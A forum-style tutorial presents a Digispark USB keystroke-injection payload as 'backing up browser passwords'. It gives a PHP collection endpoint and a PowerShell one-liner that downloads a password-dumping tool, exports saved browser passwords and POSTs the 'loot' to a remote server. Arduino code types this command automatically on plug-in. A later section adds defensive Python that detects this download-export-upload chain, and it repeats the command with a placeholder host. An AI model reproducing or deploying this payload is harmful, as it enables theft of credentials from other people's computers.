Backing up browser passwords with Digispark


Pointless chapter

Since a lot of people liked my “1$ USB Rubber Ducky alternative” tutorial, I would like to make more “Payload threads” so that the people who missed the original thread could see this and get interested in developing keystroke injection scripts.

[Image: dude asking for more tutorials]

Okay okay, I’ll do another one.

Introduction

Imagine you own a lot of computers with different passwords saved on them, and one day you decide to move all of your passwords to one place. To do this you would need to go to every computer, download a program, export the passwords and upload them to a flash drive or something.
Well, today pikami has a solution for you!
Let’s make a script that does all those things auto-magically!
For the purpose of this tutorial I will not go through setting up the Digispark dev environment; for that, take a look at 1$ USB Rubber Ducky alternative.

What exactly are we going to do?

  • Set up our web server to save incoming passwords
  • Write a script that:
    • Downloads a password recovery tool
    • Uses the tool to export browser passwords
    • Uploads exported passwords back to our server

What you’ll need

  • Digispark
  • Arduino software
  • Web server

The process

Setting up the web server

I’ll assume you already have Apache/nginx with PHP running on your server.
First you have to upload the password recovery tool to your server. For this tutorial we’ll be using WebBrowserPassView by NirSoft (link will be at the bottom of the post).
I downloaded it, named it pw.exe and placed it in the root directory of the server.
Let’s create a directory for our password exports:

mkdir log

Now let’s make a PHP upload script that saves all the data it gets to a file:

<?php
  $file = "log/" . $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
  file_put_contents($file, file_get_contents("php://input"));
?>

I copied this script from a Hak5 tutorial (link will be at the bottom of the post).
The server is now set up.

Writing the script for Digispark

Okay, so the first thing we need to do is write a PowerShell script that does what we need. First, the script should go somewhere it won’t bother the user: the Windows TEMP directory is a great place.

$TempDir = [System.IO.Path]::GetTempPath()
cd $TempDir

Then it should create its own directory so that it is easy to clean up after ourselves: “pw” is a perfect name.

mkdir pw
cd pw

Now the script should download the password recovery tool from our server and use it to export the passwords (the “| Out-Null” will force PowerShell to wait until the execution is finished):

Invoke-WebRequest "https://YOUR_SERVER/f/pw.exe" -OutFile "pw.exe" | Out-Null
.\pw.exe /scomma pw.txt | Out-Null

Then it should upload the loot to our server:

Invoke-RestMethod -Uri "https://YOUR_SERVER/upload.php" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null

Let’s clean up after ourselves, shall we?

cd ..
Remove-Item pw -recurse

Now that we have our script, let’s program the Digispark to execute it:

#include "DigiKeyboard.h"

void setup() {
  // don't need to set anything up to use DigiKeyboard
}

void loop() {
  // this is generally not necessary but with some older systems it seems to
  // prevent missing the first character after a delay:
  DigiKeyboard.sendKeyStroke(0);
  
  // Open powershell
  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("powershell");
  DigiKeyboard.delay(200);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  
  // Execute code from the interwebs
  DigiKeyboard.print("$TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;mkdir pw;cd pw;Invoke-WebRequest \"https://YOUR_SERVER/pw.exe\" -OutFile \"pw.exe\" | Out-Null;.\\pw.exe /scomma pw.txt | Out-Null;Invoke-RestMethod -Uri \"https://YOUR_SERVER/upload.php\" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null;cd ..;Remove-Item pw -recurse");
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  while(true){
    //do nothing
  }
}
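Seen from the machine the Digispark is plugged into, the one-liner typed above is a download to a file, a `/scomma` export and a POST with `-InFile`, in that order. The following is an added example, not part of the original post, that looks for that sequence in logged PowerShell script-block or command-line text; the function names, the `example.invalid` host and both sample strings are constructed for illustration.

```python
import re

# Stage name -> patterns that must ALL match inside a single statement.
STAGES = {
    "download": [r"\b(invoke-webrequest|iwr|wget|curl)\b", r"-outfile\b"],
    "export": [r"\.exe\b", r"\s/scomma\s"],  # only the switch the tutorial uses
    "upload": [r"\b(invoke-restmethod|irm|invoke-webrequest|iwr)\b",
               r"-method\s+post\b", r"-infile\b"],
    "cleanup": [r"\b(remove-item|ri|rm|del)\b", r"-recurse\b"],
}
CHAIN = ["download", "export", "upload"]  # this order is what makes it suspicious


def split_statements(script):
    """Split on ';' and newlines. Assumption: no ';' inside quoted strings."""
    return [s.strip() for s in re.split(r"[;\r\n]+", script) if s.strip()]


def find_stages(script):
    """Return [(statement_index, stage_name)] in the order the stages occur."""
    hits = []
    for i, stmt in enumerate(split_statements(script)):
        for name, patterns in STAGES.items():
            if all(re.search(p, stmt, re.I) for p in patterns):
                hits.append((i, name))
    return hits


def is_exfil_chain(script):
    """True when download, export and upload all occur, in that order."""
    first = {}
    for i, name in find_stages(script):
        first.setdefault(name, i)  # keep the first occurrence of each stage
    if not all(stage in first for stage in CHAIN):
        return False
    return first["download"] < first["export"] < first["upload"]


# Constructed samples (placeholder host), shaped like logged script-block text.
SAMPLE_HIT = (
    "$TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;mkdir pw;cd pw;"
    'Invoke-WebRequest "https://example.invalid/pw.exe" -OutFile "pw.exe" | Out-Null;'
    ".\\pw.exe /scomma pw.txt | Out-Null;"
    'Invoke-RestMethod -Uri "https://example.invalid/upload.php" -Method Post'
    " -InFile pw.txt -UseDefaultCredentials | Out-Null;cd ..;Remove-Item pw -recurse"
)
SAMPLE_BENIGN = ('Invoke-WebRequest "https://example.invalid/setup.msi" -OutFile '
                 '"setup.msi";Start-Process msiexec -ArgumentList "/i setup.msi"')

if __name__ == "__main__":
    for label, text in (("hit", SAMPLE_HIT), ("benign", SAMPLE_BENIGN)):
        print(label, is_exfil_chain(text), find_stages(text))
```

Matching on the ordered chain rather than on any single cmdlet keeps ordinary installer downloads, like the benign sample, from alerting.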

You have done it

Congratulations! You can now back up the passwords from all those computers you own!
If everything is done correctly, your exported passwords should be located on your server. Let’s look at what I got:

[Image: results of the script]

Sorry if you wanted to see more, I don’t save passwords in browsers.

Final notes

So @KuhakuWolf, I hope you’re happy.
On a real note, I hope you all learned something from this and start developing your own payloads.
I would love to see your creations and as always, if you have any questions just ask, I’ll be happy to help.

External links